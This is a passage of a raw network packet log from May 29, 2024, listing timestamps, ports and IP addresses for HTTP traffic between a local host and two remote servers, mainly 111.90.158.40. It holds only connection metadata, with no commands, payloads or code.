May 29, 2024 14:25:27.045125961 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045137882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045161009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045167923 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045171976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045186043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045203924 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045207977 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045218945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045241117 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045242071 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045254946 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045264006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045274973 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045296907 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045315981 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045326948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045337915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045352936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045360088 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045416117 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045418978 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045430899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045442104 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045450926 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045460939 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045464039 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045475006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045479059 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045506954 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045701981 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.063656092 CEST	49759	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:27.068690062 CEST	80	49759	199.232.214.172	192.168.2.4
May 29, 2024 14:25:27.072129011 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.072144032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.072177887 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.072191000 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.072191000 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.072221041 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.072233915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.072242022 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.072242975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.072257996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.072268963 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.072295904 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073180914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073196888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073209047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073220015 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073232889 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073236942 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073246002 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073256969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073257923 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073270082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073280096 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073297977 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073319912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073319912 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073331118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073340893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073352098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073359966 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073363066 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073380947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073389053 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073412895 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073412895 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073431969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073451042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073451042 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073462009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073472977 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073482990 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073491096 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073494911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073506117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073515892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073523045 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073525906 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073545933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073551893 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073570013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073580980 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073590040 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073605061 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073616982 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073616982 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073626995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073637962 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073649883 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073657036 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073661089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073678970 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073679924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073692083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073702097 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073704004 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073714018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073725939 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073734045 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073754072 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073829889 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073841095 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073851109 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073860884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073868036 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073872089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073884964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073894978 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073898077 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073908091 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.073920965 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.073951006 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074064016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074093103 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074117899 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074184895 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074224949 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074284077 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074295044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074306965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074318886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074330091 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074362040 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074419975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074430943 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074441910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074453115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074460983 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074464083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074476957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074489117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074496031 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074500084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074512005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074517012 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074523926 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074531078 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074567080 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074570894 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074582100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074592113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074601889 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074613094 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074615955 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074625015 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074636936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074641943 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074649096 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074660063 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074661016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074671030 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074682951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074687004 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074706078 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074728012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074738979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074749947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074759960 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074768066 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074779987 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074789047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074800014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074809074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074820042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074830055 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074831009 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074836969 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074841976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074852943 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074862957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074873924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074884892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074888945 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074898005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074908972 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074913979 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074922085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074934006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074937105 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.074945927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.074978113 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.075004101 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.159842968 CEST	80	49759	199.232.214.172	192.168.2.4
May 29, 2024 14:25:27.160005093 CEST	80	49759	199.232.214.172	192.168.2.4
May 29, 2024 14:25:27.160041094 CEST	49759	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:27.162738085 CEST	49759	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:27.163402081 CEST	49761	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:27.167678118 CEST	80	49759	199.232.214.172	192.168.2.4
May 29, 2024 14:25:27.168436050 CEST	80	49761	199.232.214.172	192.168.2.4
May 29, 2024 14:25:27.168494940 CEST	49761	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:27.179166079 CEST	49761	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:27.184174061 CEST	80	49761	199.232.214.172	192.168.2.4
May 29, 2024 14:25:27.260644913 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.260781050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.260793924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.260806084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.260818005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.260824919 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.260832071 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.260844946 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.260858059 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.260859966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.260891914 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.260911942 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.261128902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261152029 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261202097 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.261271954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261334896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261354923 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261368036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261375904 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.261379957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261404991 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.261430025 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261461973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261472940 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.261511087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261549950 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.261559963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261574030 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.261609077 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.263298035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263312101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263340950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263350964 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.263376951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263390064 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263417959 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.263437986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263449907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263478041 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.263482094 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263495922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263508081 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263520956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263529062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263536930 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.263592005 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.263741970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263885975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.263922930 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.263974905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264087915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264125109 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.264127970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264147043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264158964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264170885 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264183044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264183044 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.264194965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264206886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264211893 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.264219999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264231920 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264236927 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.264245987 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264256954 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.264260054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.264286995 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.265806913 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265820980 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265831947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265844107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265851021 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.265856028 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265868902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265878916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.265887976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265899897 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265914917 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.265928984 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.265945911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265959024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265969038 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265980959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.265985966 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.265994072 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266005993 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266005993 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266017914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266031981 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266031981 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266045094 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266056061 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266068935 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266094923 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266128063 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266146898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266159058 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266165018 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266177893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266190052 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266199112 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266216993 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266228914 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266231060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266242981 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266258001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266268969 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266269922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266283035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266294956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266299009 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266307116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266319990 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266324997 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266331911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266341925 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266345978 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266359091 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266371012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266371965 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266381979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266396046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266407013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266413927 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266418934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266429901 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266442060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266443968 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266453981 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266468048 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266474009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266499043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266505003 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266510010 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266530991 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266536951 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266560078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266571045 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266586065 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266597986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266608000 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266623974 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266628027 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266647100 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266647100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266660929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266685009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266689062 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266702890 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266715050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.266722918 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.266726971 CEST	80	49760	111.90.158.40	192.168.2.4
